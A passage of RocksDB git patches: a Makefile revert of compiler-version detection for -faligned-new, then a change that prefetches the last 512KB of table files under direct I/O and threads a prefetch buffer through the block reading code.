096/205] Revert "Makefile: correct faligned-new test" Summary: This reverting #2699 to fix clang build. Closes https://github.com/facebook/rocksdb/pull/2723 Differential Revision: D5610207 Pulled By: yiwu-arbug fbshipit-source-id: 6857f4556d6d18f17b74cf81fa936d1dc0bd364c --- Makefile | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/Makefile b/Makefile index 87831fc1aef..9b80864fcd8 100644 --- a/Makefile +++ b/Makefile @@ -259,11 +259,18 @@ default: all WARNING_FLAGS = -W -Wextra -Wall -Wsign-compare -Wshadow \ -Wno-unused-parameter -CCFALIGNED := $(shell $(CXX) --version | awk 'NR==1 { split($$3, ver, "."); if (($$1 == "clang" && ver[1] >= 4) || ($$2 == "(GCC)" && ver[1] >= 7)) { print "yes" } }') +CCVERSION = $(shell $(CXX) -dumpversion) +CCNAME = $(shell $(CXX) --version | awk 'NR==1' | cut -f1 -d " ") -ifeq ($(CCFALIGNED), yes) +ifeq ($(CCNAME), clang) +ifeq ($(CCVERSION), 4*) CXXFLAGS += -faligned-new endif +else +ifeq ($(CCVERSION), 7) + CXXFLAGS += -faligned-new +endif +endif ifndef DISABLE_WARNING_AS_ERROR WARNING_FLAGS += -Werror From 666a005f9b9231800e31ea2276b8da89d665e608 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Fri, 11 Aug 2017 11:59:13 -0700 Subject: [PATCH 097/205] Support prefetch last 512KB with direct I/O in block based file reader Summary: Right now, if direct I/O is enabled, prefetching the last 512KB cannot be applied, except compaction inputs or readahead is enabled for iterators. This can create a lot of I/O for HDD cases. To solve the problem, the 512KB is prefetched in block based table if direct I/O is enabled. The prefetched buffer is passed in totegher with random access file reader, so that we try to read from the buffer before reading from the file. This can be extended in the future to support flexible user iterator readahead too. Closes https://github.com/facebook/rocksdb/pull/2708 Differential Revision: D5593091 Pulled By: siying fbshipit-source-id: ee36ff6d8af11c312a2622272b21957a7b5c81e7 --- db/db_test2.cc | 11 +- table/adaptive_table_factory.cc | 3 +- table/block_based_table_reader.cc | 186 +++++++++++++++++------------ table/block_based_table_reader.h | 8 +- table/format.cc | 189 +++++++++++++++++------------- table/format.h | 12 +- table/meta_blocks.cc | 44 ++++--- table/meta_blocks.h | 8 +- table/partitioned_filter_block.cc | 15 ++- table/partitioned_filter_block.h | 3 +- table/plain_table_reader.cc | 13 +- tools/sst_dump_tool.cc | 3 +- util/file_reader_writer.cc | 28 +++++ util/file_reader_writer.h | 11 ++ 14 files changed, 333 insertions(+), 201 deletions(-) diff --git a/db/db_test2.cc b/db/db_test2.cc index ca8986c4d8d..c223f2b0082 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -2282,12 +2282,15 @@ TEST_F(DBTest2, RateLimitedCompactionReads) { // chose 1MB as the upper bound on the total bytes read. size_t rate_limited_bytes = options.rate_limiter->GetTotalBytesThrough(Env::IO_LOW); - ASSERT_GE( - rate_limited_bytes, - static_cast(kNumKeysPerFile * kBytesPerKey * kNumL0Files)); + // Include the explict prefetch of the footer in direct I/O case. + size_t direct_io_extra = use_direct_io ? 512 * 1024 : 0; + ASSERT_GE(rate_limited_bytes, + static_cast(kNumKeysPerFile * kBytesPerKey * kNumL0Files + + direct_io_extra)); ASSERT_LT( rate_limited_bytes, - static_cast(2 * kNumKeysPerFile * kBytesPerKey * kNumL0Files)); + static_cast(2 * kNumKeysPerFile * kBytesPerKey * kNumL0Files + + direct_io_extra)); Iterator* iter = db_->NewIterator(ReadOptions()); for (iter->SeekToFirst(); iter->Valid(); iter->Next()) { diff --git a/table/adaptive_table_factory.cc b/table/adaptive_table_factory.cc index f83905dff3a..47069f86695 100644 --- a/table/adaptive_table_factory.cc +++ b/table/adaptive_table_factory.cc @@ -46,7 +46,8 @@ Status AdaptiveTableFactory::NewTableReader( unique_ptr* table, bool prefetch_index_and_filter_in_cache) const { Footer footer; - auto s = ReadFooterFromFile(file.get(), file_size, &footer); + auto s = ReadFooterFromFile(file.get(), nullptr /* prefetch_buffer */, + file_size, &footer); if (!s.ok()) { return s; } diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 5931692f029..89e0c735490 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -70,17 +70,17 @@ namespace { // On success fill *result and return OK - caller owns *result // @param compression_dict Data for presetting the compression library's // dictionary. -Status ReadBlockFromFile(RandomAccessFileReader* file, const Footer& footer, - const ReadOptions& options, const BlockHandle& handle, - std::unique_ptr* result, - const ImmutableCFOptions& ioptions, bool do_uncompress, - const Slice& compression_dict, - const PersistentCacheOptions& cache_options, - SequenceNumber global_seqno, - size_t read_amp_bytes_per_bit) { +Status ReadBlockFromFile( + RandomAccessFileReader* file, FilePrefetchBuffer* prefetch_buffer, + const Footer& footer, const ReadOptions& options, const BlockHandle& handle, + std::unique_ptr* result, const ImmutableCFOptions& ioptions, + bool do_uncompress, const Slice& compression_dict, + const PersistentCacheOptions& cache_options, SequenceNumber global_seqno, + size_t read_amp_bytes_per_bit) { BlockContents contents; - Status s = ReadBlockContents(file, footer, options, handle, &contents, ioptions, - do_uncompress, compression_dict, cache_options); + Status s = ReadBlockContents(file, prefetch_buffer, footer, options, handle, + &contents, ioptions, do_uncompress, + compression_dict, cache_options); if (s.ok()) { result->reset(new Block(std::move(contents), global_seqno, read_amp_bytes_per_bit, ioptions.statistics)); @@ -157,6 +157,7 @@ class PartitionIndexReader : public IndexReader, public Cleanable { // On success, index_reader will be populated; otherwise it will remain // unmodified. static Status Create(BlockBasedTable* table, RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, const Footer& footer, const BlockHandle& index_handle, const ImmutableCFOptions& ioptions, const InternalKeyComparator* icomparator, @@ -165,8 +166,9 @@ class PartitionIndexReader : public IndexReader, public Cleanable { const int level) { std::unique_ptr index_block; auto s = ReadBlockFromFile( - file, footer, ReadOptions(), index_handle, &index_block, ioptions, - true /* decompress */, Slice() /*compression dict*/, cache_options, + file, prefetch_buffer, footer, ReadOptions(), index_handle, + &index_block, ioptions, true /* decompress */, + Slice() /*compression dict*/, cache_options, kDisableGlobalSequenceNumber, 0 /* read_amp_bytes_per_bit */); if (s.ok()) { @@ -238,16 +240,18 @@ class BinarySearchIndexReader : public IndexReader { // `BinarySearchIndexReader`. // On success, index_reader will be populated; otherwise it will remain // unmodified. - static Status Create(RandomAccessFileReader* file, const Footer& footer, - const BlockHandle& index_handle, + static Status Create(RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, + const Footer& footer, const BlockHandle& index_handle, const ImmutableCFOptions& ioptions, const InternalKeyComparator* icomparator, IndexReader** index_reader, const PersistentCacheOptions& cache_options) { std::unique_ptr index_block; auto s = ReadBlockFromFile( - file, footer, ReadOptions(), index_handle, &index_block, ioptions, - true /* decompress */, Slice() /*compression dict*/, cache_options, + file, prefetch_buffer, footer, ReadOptions(), index_handle, + &index_block, ioptions, true /* decompress */, + Slice() /*compression dict*/, cache_options, kDisableGlobalSequenceNumber, 0 /* read_amp_bytes_per_bit */); if (s.ok()) { @@ -289,6 +293,7 @@ class HashIndexReader : public IndexReader { public: static Status Create(const SliceTransform* hash_key_extractor, const Footer& footer, RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, const ImmutableCFOptions& ioptions, const InternalKeyComparator* icomparator, const BlockHandle& index_handle, @@ -298,8 +303,9 @@ class HashIndexReader : public IndexReader { const PersistentCacheOptions& cache_options) { std::unique_ptr index_block; auto s = ReadBlockFromFile( - file, footer, ReadOptions(), index_handle, &index_block, ioptions, - true /* decompress */, Slice() /*compression dict*/, cache_options, + file, prefetch_buffer, footer, ReadOptions(), index_handle, + &index_block, ioptions, true /* decompress */, + Slice() /*compression dict*/, cache_options, kDisableGlobalSequenceNumber, 0 /* read_amp_bytes_per_bit */); if (!s.ok()) { @@ -335,15 +341,17 @@ class HashIndexReader : public IndexReader { // Read contents for the blocks BlockContents prefixes_contents; - s = ReadBlockContents(file, footer, ReadOptions(), prefixes_handle, - &prefixes_contents, ioptions, true /* decompress */, - Slice() /*compression dict*/, cache_options); + s = ReadBlockContents(file, prefetch_buffer, footer, ReadOptions(), + prefixes_handle, &prefixes_contents, ioptions, + true /* decompress */, Slice() /*compression dict*/, + cache_options); if (!s.ok()) { return s; } BlockContents prefixes_meta_contents; - s = ReadBlockContents(file, footer, ReadOptions(), prefixes_meta_handle, - &prefixes_meta_contents, ioptions, true /* decompress */, + s = ReadBlockContents(file, prefetch_buffer, footer, ReadOptions(), + prefixes_meta_handle, &prefixes_meta_contents, + ioptions, true /* decompress */, Slice() /*compression dict*/, cache_options); if (!s.ok()) { // TODO: log error @@ -535,12 +543,29 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, Footer footer; + std::unique_ptr prefetch_buffer; + // Before read footer, readahead backwards to prefetch data - Status s = - file->Prefetch((file_size < 512 * 1024 ? 0 : file_size - 512 * 1024), - 512 * 1024 /* 512 KB prefetching */); - s = ReadFooterFromFile(file.get(), file_size, &footer, - kBlockBasedTableMagicNumber); + const size_t kTailPrefetchSize = 512 * 1024; + size_t prefetch_off; + size_t prefetch_len; + if (file_size < kTailPrefetchSize) { + prefetch_off = 0; + prefetch_len = file_size; + } else { + prefetch_off = file_size - kTailPrefetchSize; + prefetch_len = kTailPrefetchSize; + } + Status s; + // TODO should not have this special logic in the future. + if (!file->use_direct_io()) { + s = file->Prefetch(prefetch_off, prefetch_len); + } else { + prefetch_buffer.reset(new FilePrefetchBuffer()); + s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len); + } + s = ReadFooterFromFile(file.get(), prefetch_buffer.get(), file_size, &footer, + kBlockBasedTableMagicNumber); if (!s.ok()) { return s; } @@ -577,7 +602,7 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, // Read meta index std::unique_ptr meta; std::unique_ptr meta_iter; - s = ReadMetaBlock(rep, &meta, &meta_iter); + s = ReadMetaBlock(rep, prefetch_buffer.get(), &meta, &meta_iter); if (!s.ok()) { return s; } @@ -623,8 +648,9 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, s = meta_iter->status(); TableProperties* table_properties = nullptr; if (s.ok()) { - s = ReadProperties(meta_iter->value(), rep->file.get(), rep->footer, - rep->ioptions, &table_properties); + s = ReadProperties(meta_iter->value(), rep->file.get(), + prefetch_buffer.get(), rep->footer, rep->ioptions, + &table_properties); } if (!s.ok()) { @@ -655,9 +681,9 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, // TODO(andrewkr): ReadMetaBlock repeats SeekToCompressionDictBlock(). // maybe decode a handle from meta_iter // and do ReadBlockContents(handle) instead - s = rocksdb::ReadMetaBlock(rep->file.get(), file_size, - kBlockBasedTableMagicNumber, rep->ioptions, - rocksdb::kCompressionDictBlock, + s = rocksdb::ReadMetaBlock(rep->file.get(), prefetch_buffer.get(), + file_size, kBlockBasedTableMagicNumber, + rep->ioptions, rocksdb::kCompressionDictBlock, compression_dict_block.get()); if (!s.ok()) { ROCKS_LOG_WARN( @@ -682,6 +708,7 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, } else { if (found_range_del_block && !rep->range_del_handle.IsNull()) { ReadOptions read_options; + // TODO: try to use prefetched buffer too. s = MaybeLoadDataBlockToCache(rep, read_options, rep->range_del_handle, Slice() /* compression_dict */, &rep->range_del_entry); @@ -753,7 +780,8 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, // pre-load these blocks, which will kept in member variables in Rep // and with a same life-time as this table object. IndexReader* index_reader = nullptr; - s = new_table->CreateIndexReader(&index_reader, meta_iter.get(), level); + s = new_table->CreateIndexReader(prefetch_buffer.get(), &index_reader, + meta_iter.get(), level); if (s.ok()) { rep->index_reader.reset(index_reader); @@ -761,8 +789,8 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, // Set filter block if (rep->filter_policy) { const bool is_a_filter_partition = true; - rep->filter.reset( - new_table->ReadFilter(rep->filter_handle, !is_a_filter_partition)); + rep->filter.reset(new_table->ReadFilter( + prefetch_buffer.get(), rep->filter_handle, !is_a_filter_partition)); if (rep->filter.get()) { rep->filter->SetLevel(level); } @@ -816,13 +844,14 @@ size_t BlockBasedTable::ApproximateMemoryUsage() const { // Load the meta-block from the file. On success, return the loaded meta block // and its iterator. Status BlockBasedTable::ReadMetaBlock(Rep* rep, + FilePrefetchBuffer* prefetch_buffer, std::unique_ptr* meta_block, std::unique_ptr* iter) { // TODO(sanjay): Skip this if footer.metaindex_handle() size indicates // it is an empty block. std::unique_ptr meta; Status s = ReadBlockFromFile( - rep->file.get(), rep->footer, ReadOptions(), + rep->file.get(), prefetch_buffer, rep->footer, ReadOptions(), rep->footer.metaindex_handle(), &meta, rep->ioptions, true /* decompress */, Slice() /*compression dict*/, rep->persistent_cache_options, kDisableGlobalSequenceNumber, @@ -1021,7 +1050,8 @@ Status BlockBasedTable::PutDataBlockToCache( } FilterBlockReader* BlockBasedTable::ReadFilter( - const BlockHandle& filter_handle, const bool is_a_filter_partition) const { + FilePrefetchBuffer* prefetch_buffer, const BlockHandle& filter_handle, + const bool is_a_filter_partition) const { auto& rep = rep_; // TODO: We might want to unify with ReadBlockFromFile() if we start // requiring checksum verification in Table::Open. @@ -1029,8 +1059,8 @@ FilterBlockReader* BlockBasedTable::ReadFilter( return nullptr; } BlockContents block; - if (!ReadBlockContents(rep->file.get(), rep->footer, ReadOptions(), - filter_handle, &block, rep->ioptions, + if (!ReadBlockContents(rep->file.get(), prefetch_buffer, rep->footer, + ReadOptions(), filter_handle, &block, rep->ioptions, false /* decompress */, Slice() /*compression dict*/, rep->persistent_cache_options) .ok()) { @@ -1127,7 +1157,8 @@ BlockBasedTable::CachableEntry BlockBasedTable::GetFilter( // Do not invoke any io. return CachableEntry(); } else { - filter = ReadFilter(filter_blk_handle, is_a_filter_partition); + filter = ReadFilter(nullptr /* prefetch_buffer */, filter_blk_handle, + is_a_filter_partition); if (filter != nullptr) { assert(filter->size() > 0); Status s = block_cache->Insert( @@ -1195,7 +1226,7 @@ InternalIterator* BlockBasedTable::NewIndexIterator( // Create index reader and put it in the cache. Status s; TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread2:2"); - s = CreateIndexReader(&index_reader); + s = CreateIndexReader(nullptr /* prefetch_buffer */, &index_reader); TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread1:1"); TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread2:3"); TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread1:4"); @@ -1290,10 +1321,11 @@ InternalIterator* BlockBasedTable::NewDataBlockIterator( } } std::unique_ptr block_value; - s = ReadBlockFromFile( - rep->file.get(), rep->footer, ro, handle, &block_value, rep->ioptions, - true /* compress */, compression_dict, rep->persistent_cache_options, - rep->global_seqno, rep->table_options.read_amp_bytes_per_bit); + s = ReadBlockFromFile(rep->file.get(), nullptr /* prefetch_buffer */, + rep->footer, ro, handle, &block_value, rep->ioptions, + true /* compress */, compression_dict, + rep->persistent_cache_options, rep->global_seqno, + rep->table_options.read_amp_bytes_per_bit); if (s.ok()) { block.value = block_value.release(); } @@ -1360,11 +1392,12 @@ Status BlockBasedTable::MaybeLoadDataBlockToCache( std::unique_ptr raw_block; { StopWatch sw(rep->ioptions.env, statistics, READ_BLOCK_GET_MICROS); - s = ReadBlockFromFile( - rep->file.get(), rep->footer, ro, handle, &raw_block, rep->ioptions, - block_cache_compressed == nullptr, compression_dict, - rep->persistent_cache_options, rep->global_seqno, - rep->table_options.read_amp_bytes_per_bit); + s = ReadBlockFromFile(rep->file.get(), nullptr /* prefetch_buffer*/, + rep->footer, ro, handle, &raw_block, + rep->ioptions, block_cache_compressed == nullptr, + compression_dict, rep->persistent_cache_options, + rep->global_seqno, + rep->table_options.read_amp_bytes_per_bit); } if (s.ok()) { @@ -1750,7 +1783,7 @@ Status BlockBasedTable::VerifyChecksum() { // Check Meta blocks std::unique_ptr meta; std::unique_ptr meta_iter; - s = ReadMetaBlock(rep_, &meta, &meta_iter); + s = ReadMetaBlock(rep_, nullptr /* prefetch buffer */, &meta, &meta_iter); if (s.ok()) { s = VerifyChecksumInBlocks(meta_iter.get()); if (!s.ok()) { @@ -1788,9 +1821,10 @@ Status BlockBasedTable::VerifyChecksumInBlocks(InternalIterator* index_iter) { break; } BlockContents contents; - s = ReadBlockContents(rep_->file.get(), rep_->footer, ReadOptions(), - handle, &contents, rep_->ioptions, - false /* decompress */, Slice() /*compression dict*/, + s = ReadBlockContents(rep_->file.get(), nullptr /* prefetch buffer */, + rep_->footer, ReadOptions(), handle, &contents, + rep_->ioptions, false /* decompress */, + Slice() /*compression dict*/, rep_->persistent_cache_options); if (!s.ok()) { break; @@ -1840,8 +1874,8 @@ bool BlockBasedTable::TEST_KeyInCache(const ReadOptions& options, // 4. internal_comparator // 5. index_type Status BlockBasedTable::CreateIndexReader( - IndexReader** index_reader, InternalIterator* preloaded_meta_index_iter, - int level) { + FilePrefetchBuffer* prefetch_buffer, IndexReader** index_reader, + InternalIterator* preloaded_meta_index_iter, int level) { // Some old version of block-based tables don't have index type present in // table properties. If that's the case we can safely use the kBinarySearch. auto index_type_on_file = BlockBasedTableOptions::kBinarySearch; @@ -1869,20 +1903,22 @@ Status BlockBasedTable::CreateIndexReader( switch (index_type_on_file) { case BlockBasedTableOptions::kTwoLevelIndexSearch: { return PartitionIndexReader::Create( - this, file, footer, footer.index_handle(), rep_->ioptions, - icomparator, index_reader, rep_->persistent_cache_options, level); + this, file, prefetch_buffer, footer, footer.index_handle(), + rep_->ioptions, icomparator, index_reader, + rep_->persistent_cache_options, level); } case BlockBasedTableOptions::kBinarySearch: { return BinarySearchIndexReader::Create( - file, footer, footer.index_handle(), rep_->ioptions, icomparator, - index_reader, rep_->persistent_cache_options); + file, prefetch_buffer, footer, footer.index_handle(), rep_->ioptions, + icomparator, index_reader, rep_->persistent_cache_options); } case BlockBasedTableOptions::kHashSearch: { std::unique_ptr meta_guard; std::unique_ptr meta_iter_guard; auto meta_index_iter = preloaded_meta_index_iter; if (meta_index_iter == nullptr) { - auto s = ReadMetaBlock(rep_, &meta_guard, &meta_iter_guard); + auto s = + ReadMetaBlock(rep_, prefetch_buffer, &meta_guard, &meta_iter_guard); if (!s.ok()) { // we simply fall back to binary search in case there is any // problem with prefix hash index loading. @@ -1890,16 +1926,18 @@ Status BlockBasedTable::CreateIndexReader( "Unable to read the metaindex block." " Fall back to binary search index."); return BinarySearchIndexReader::Create( - file, footer, footer.index_handle(), rep_->ioptions, icomparator, - index_reader, rep_->persistent_cache_options); + file, prefetch_buffer, footer, footer.index_handle(), + rep_->ioptions, icomparator, index_reader, + rep_->persistent_cache_options); } meta_index_iter = meta_iter_guard.get(); } return HashIndexReader::Create( - rep_->internal_prefix_transform.get(), footer, file, rep_->ioptions, - icomparator, footer.index_handle(), meta_index_iter, index_reader, - rep_->hash_index_allow_collision, rep_->persistent_cache_options); + rep_->internal_prefix_transform.get(), footer, file, prefetch_buffer, + rep_->ioptions, icomparator, footer.index_handle(), meta_index_iter, + index_reader, rep_->hash_index_allow_collision, + rep_->persistent_cache_options); } default: { std::string error_message = @@ -2015,7 +2053,8 @@ Status BlockBasedTable::DumpTable(WritableFile* out_file) { "--------------------------------------\n"); std::unique_ptr meta; std::unique_ptr meta_iter; - Status s = ReadMetaBlock(rep_, &meta, &meta_iter); + Status s = + ReadMetaBlock(rep_, nullptr /* prefetch_buffer */, &meta, &meta_iter); if (s.ok()) { for (meta_iter->SeekToFirst(); meta_iter->Valid(); meta_iter->Next()) { s = meta_iter->status(); @@ -2071,10 +2110,11 @@ Status BlockBasedTable::DumpTable(WritableFile* out_file) { BlockHandle handle; if (FindMetaBlock(meta_iter.get(), filter_block_key, &handle).ok()) { BlockContents block; - if (ReadBlockContents( - rep_->file.get(), rep_->footer, ReadOptions(), handle, &block, - rep_->ioptions, false /*decompress*/, - Slice() /*compression dict*/, rep_->persistent_cache_options) + if (ReadBlockContents(rep_->file.get(), nullptr /* prefetch_buffer */, + rep_->footer, ReadOptions(), handle, &block, + rep_->ioptions, false /*decompress*/, + Slice() /*compression dict*/, + rep_->persistent_cache_options) .ok()) { rep_->filter.reset(new BlockBasedFilterBlockReader( rep_->ioptions.prefix_extractor, table_options, diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h index 3451614c878..457edce2205 100644 --- a/table/block_based_table_reader.h +++ b/table/block_based_table_reader.h @@ -300,7 +300,7 @@ class BlockBasedTable : public TableReader { // need to access extra meta blocks for index construction. This parameter // helps avoid re-reading meta index block if caller already created one. Status CreateIndexReader( - IndexReader** index_reader, + FilePrefetchBuffer* prefetch_buffer, IndexReader** index_reader, InternalIterator* preloaded_meta_index_iter = nullptr, const int level = -1); @@ -309,13 +309,15 @@ class BlockBasedTable : public TableReader { const bool no_io) const; // Read the meta block from sst. - static Status ReadMetaBlock(Rep* rep, std::unique_ptr* meta_block, + static Status ReadMetaBlock(Rep* rep, FilePrefetchBuffer* prefetch_buffer, + std::unique_ptr* meta_block, std::unique_ptr* iter); Status VerifyChecksumInBlocks(InternalIterator* index_iter); // Create the filter from the filter block. - FilterBlockReader* ReadFilter(const BlockHandle& filter_handle, + FilterBlockReader* ReadFilter(FilePrefetchBuffer* prefetch_buffer, + const BlockHandle& filter_handle, const bool is_a_filter_partition) const; static void SetupCacheKeyPrefix(Rep* rep, uint64_t file_size); diff --git a/table/format.cc b/table/format.cc index 3e5a191bbf2..e5f2df0074a 100644 --- a/table/format.cc +++ b/table/format.cc @@ -216,8 +216,10 @@ std::string Footer::ToString() const { return result; } -Status ReadFooterFromFile(RandomAccessFileReader* file, uint64_t file_size, - Footer* footer, uint64_t enforce_table_magic_number) { +Status ReadFooterFromFile(RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, + uint64_t file_size, Footer* footer, + uint64_t enforce_table_magic_number) { if (file_size < Footer::kMinEncodedLength) { return Status::Corruption( "file is too short (" + ToString(file_size) + " bytes) to be an " @@ -230,9 +232,14 @@ Status ReadFooterFromFile(RandomAccessFileReader* file, uint64_t file_size, (file_size > Footer::kMaxEncodedLength) ? static_cast(file_size - Footer::kMaxEncodedLength) : 0; - Status s = file->Read(read_offset, Footer::kMaxEncodedLength, &footer_input, - footer_space); - if (!s.ok()) return s; + Status s; + if (prefetch_buffer == nullptr || + !prefetch_buffer->TryReadFromCache(read_offset, Footer::kMaxEncodedLength, + &footer_input)) { + s = file->Read(read_offset, Footer::kMaxEncodedLength, &footer_input, + footer_space); + if (!s.ok()) return s; + } // Check that we actually read the whole footer from the file. It may be // that size isn't correct. @@ -259,6 +266,43 @@ Status ReadFooterFromFile(RandomAccessFileReader* file, uint64_t file_size, // Without anonymous namespace here, we fail the warning -Wmissing-prototypes namespace { +Status CheckBlockChecksum(const ReadOptions& options, const Footer& footer, + const Slice& contents, size_t block_size, + RandomAccessFileReader* file, + const BlockHandle& handle) { + Status s; + // Check the crc of the type and the block contents + if (options.verify_checksums) { + const char* data = contents.data(); // Pointer to where Read put the data + PERF_TIMER_GUARD(block_checksum_time); + uint32_t value = DecodeFixed32(data + block_size + 1); + uint32_t actual = 0; + switch (footer.checksum()) { + case kCRC32c: + value = crc32c::Unmask(value); + actual = crc32c::Value(data, block_size + 1); + break; + case kxxHash: + actual = XXH32(data, static_cast(block_size) + 1, 0); + break; + default: + s = Status::Corruption( + "unknown checksum type " + ToString(footer.checksum()) + " in " + + file->file_name() + " offset " + ToString(handle.offset()) + + " size " + ToString(block_size)); + } + if (s.ok() && actual != value) { + s = Status::Corruption( + "block checksum mismatch: expected " + ToString(actual) + ", got " + + ToString(value) + " in " + file->file_name() + " offset " + + ToString(handle.offset()) + " size " + ToString(block_size)); + } + if (!s.ok()) { + return s; + } + } + return s; +} // Read a block and check its CRC // contents is the result of reading. @@ -281,53 +325,21 @@ Status ReadBlock(RandomAccessFileReader* file, const Footer& footer, return s; } if (contents->size() != n + kBlockTrailerSize) { - return Status::Corruption( - "truncated block read from " + file->file_name() + " offset " - + ToString(handle.offset()) + ", expected " - + ToString(n + kBlockTrailerSize) + " bytes, got " - + ToString(contents->size())); - } - - // Check the crc of the type and the block contents - const char* data = contents->data(); // Pointer to where Read put the data - if (options.verify_checksums) { - PERF_TIMER_GUARD(block_checksum_time); - uint32_t value = DecodeFixed32(data + n + 1); - uint32_t actual = 0; - switch (footer.checksum()) { - case kCRC32c: - value = crc32c::Unmask(value); - actual = crc32c::Value(data, n + 1); - break; - case kxxHash: - actual = XXH32(data, static_cast(n) + 1, 0); - break; - default: - s = Status::Corruption( - "unknown checksum type " + ToString(footer.checksum()) - + " in " + file->file_name() + " offset " - + ToString(handle.offset()) + " size " + ToString(n)); - } - if (s.ok() && actual != value) { - s = Status::Corruption( - "block checksum mismatch: expected " + ToString(actual) - + ", got " + ToString(value) + " in " + file->file_name() - + " offset " + ToString(handle.offset()) - + " size " + ToString(n)); - } - if (!s.ok()) { - return s; - } + return Status::Corruption("truncated block read from " + file->file_name() + + " offset " + ToString(handle.offset()) + + ", expected " + ToString(n + kBlockTrailerSize) + + " bytes, got " + ToString(contents->size())); } - return s; + return CheckBlockChecksum(options, footer, *contents, n, file, handle); } } // namespace -Status ReadBlockContents(RandomAccessFileReader* file, const Footer& footer, - const ReadOptions& read_options, +Status ReadBlockContents(RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, + const Footer& footer, const ReadOptions& read_options, const BlockHandle& handle, BlockContents* contents, - const ImmutableCFOptions &ioptions, + const ImmutableCFOptions& ioptions, bool decompression_requested, const Slice& compression_dict, const PersistentCacheOptions& cache_options) { @@ -357,8 +369,21 @@ Status ReadBlockContents(RandomAccessFileReader* file, const Footer& footer, } } - if (cache_options.persistent_cache && - cache_options.persistent_cache->IsCompressed()) { + bool got_from_prefetch_buffer = false; + if (prefetch_buffer != nullptr && + prefetch_buffer->TryReadFromCache( + handle.offset(), + static_cast(handle.size()) + kBlockTrailerSize, &slice)) { + status = + CheckBlockChecksum(read_options, footer, slice, + static_cast(handle.size()), file, handle); + if (!status.ok()) { + return status; + } + got_from_prefetch_buffer = true; + used_buf = const_cast(slice.data()); + } else if (cache_options.persistent_cache && + cache_options.persistent_cache->IsCompressed()) { // lookup uncompressed cache mode p-cache status = PersistentCacheHelper::LookupRawPage( cache_options, handle, &heap_buf, n + kBlockTrailerSize); @@ -366,40 +391,42 @@ Status ReadBlockContents(RandomAccessFileReader* file, const Footer& footer, status = Status::NotFound(); } - if (status.ok()) { - // cache hit - used_buf = heap_buf.get(); - slice = Slice(heap_buf.get(), n); - } else { - if (ioptions.info_log && !status.IsNotFound()) { - assert(!status.ok()); - ROCKS_LOG_INFO(ioptions.info_log, - "Error reading from persistent cache. %s", - status.ToString().c_str()); - } - // cache miss read from device - if (decompression_requested && - n + kBlockTrailerSize < DefaultStackBufferSize) { - // If we've got a small enough hunk of data, read it in to the - // trivially allocated stack buffer instead of needing a full malloc() - used_buf = &stack_buf[0]; - } else { - heap_buf = std::unique_ptr(new char[n + kBlockTrailerSize]); + if (!got_from_prefetch_buffer) { + if (status.ok()) { + // cache hit used_buf = heap_buf.get(); - } + slice = Slice(heap_buf.get(), n); + } else { + if (ioptions.info_log && !status.IsNotFound()) { + assert(!status.ok()); + ROCKS_LOG_INFO(ioptions.info_log, + "Error reading from persistent cache. %s", + status.ToString().c_str()); + } + // cache miss read from device + if (decompression_requested && + n + kBlockTrailerSize < DefaultStackBufferSize) { + // If we've got a small enough hunk of data, read it in to the + // trivially allocated stack buffer instead of needing a full malloc() + used_buf = &stack_buf[0]; + } else { + heap_buf = std::unique_ptr(new char[n + kBlockTrailerSize]); + used_buf = heap_buf.get(); + } - status = ReadBlock(file, footer, read_options, handle, &slice, used_buf); - if (status.ok() && read_options.fill_cache && - cache_options.persistent_cache && - cache_options.persistent_cache->IsCompressed()) { - // insert to raw cache - PersistentCacheHelper::InsertRawPage(cache_options, handle, used_buf, - n + kBlockTrailerSize); + status = ReadBlock(file, footer, read_options, handle, &slice, used_buf); + if (status.ok() && read_options.fill_cache && + cache_options.persistent_cache && + cache_options.persistent_cache->IsCompressed()) { + // insert to raw cache + PersistentCacheHelper::InsertRawPage(cache_options, handle, used_buf, + n + kBlockTrailerSize); + } } - } - if (!status.ok()) { - return status; + if (!status.ok()) { + return status; + } } PERF_TIMER_GUARD(block_decompress_time); @@ -416,14 +443,14 @@ Status ReadBlockContents(RandomAccessFileReader* file, const Footer& footer, *contents = BlockContents(Slice(slice.data(), n), false, compression_type); } else { // page is uncompressed, the buffer either stack or heap provided - if (used_buf == &stack_buf[0]) { + if (got_from_prefetch_buffer || used_buf == &stack_buf[0]) { heap_buf = std::unique_ptr(new char[n]); - memcpy(heap_buf.get(), stack_buf, n); + memcpy(heap_buf.get(), used_buf, n); } *contents = BlockContents(std::move(heap_buf), n, true, compression_type); } - if (status.ok() && read_options.fill_cache && + if (status.ok() && !got_from_prefetch_buffer && read_options.fill_cache && cache_options.persistent_cache && !cache_options.persistent_cache->IsCompressed()) { // insert to uncompressed cache diff --git a/table/format.h b/table/format.h index d89b1d312cf..512b4a32bfa 100644 --- a/table/format.h +++ b/table/format.h @@ -18,6 +18,7 @@ #include "options/cf_options.h" #include "port/port.h" // noexcept #include "table/persistent_cache_options.h" +#include "util/file_reader_writer.h" namespace rocksdb { @@ -173,8 +174,9 @@ class Footer { // Read the footer from file // If enforce_table_magic_number != 0, ReadFooterFromFile() will return // corruption if table_magic number is not equal to enforce_table_magic_number -Status ReadFooterFromFile(RandomAccessFileReader* file, uint64_t file_size, - Footer* footer, +Status ReadFooterFromFile(RandomAccessFileReader* file, + 